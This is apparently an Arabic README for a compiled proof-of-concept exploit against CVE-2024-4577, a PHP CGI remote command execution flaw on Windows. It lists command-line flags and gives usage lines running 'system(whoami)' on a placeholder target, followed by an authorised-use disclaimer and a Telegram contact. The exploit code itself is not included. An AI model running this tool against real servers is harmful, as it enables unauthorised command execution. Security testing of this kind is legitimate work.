
استغلال (C) CVE-2024-4577 على PHP CGI
يحتوي هذا المستودع على استغلال إثبات المفهوم لثغرة CVE-2024-4577 في إصدارات PHP CGI 8.1 و8.2 و8.3 التي تعمل على أنظمة Windows. تسمح هذه الثغرة بتنفيذ الأوامر عن بُعد (RCE) من خلال استغلال تكوينات PHP CGI غير الآمنة.
-u : رابط URL المستهدف لـ PHP CGI
-c : تنفيذ الأمر على الخادم
-p : منفذ الاستماع
=> CVE-2024-4577.exe -u http://target/cgi-bin/php-cgi.exe "system(whoami)" أو وسيط منفذ الاستماع: => CVE-2024-4577.exe -u http://target/cgi-bin/php-cgi.exe "system(whoami)" -p 1234
تحذير: هذه الأداة مخصصة للاستخدام التعليمي واختبار الأمان المصرح به فقط!
لا تستخدم هذا الاستغلال على أنظمة دون إذن صريح من المالك.
الاستخدام غير المصرح به قد يؤدي إلى عواقب قانونية.
تيليغرام: @ByteReaper0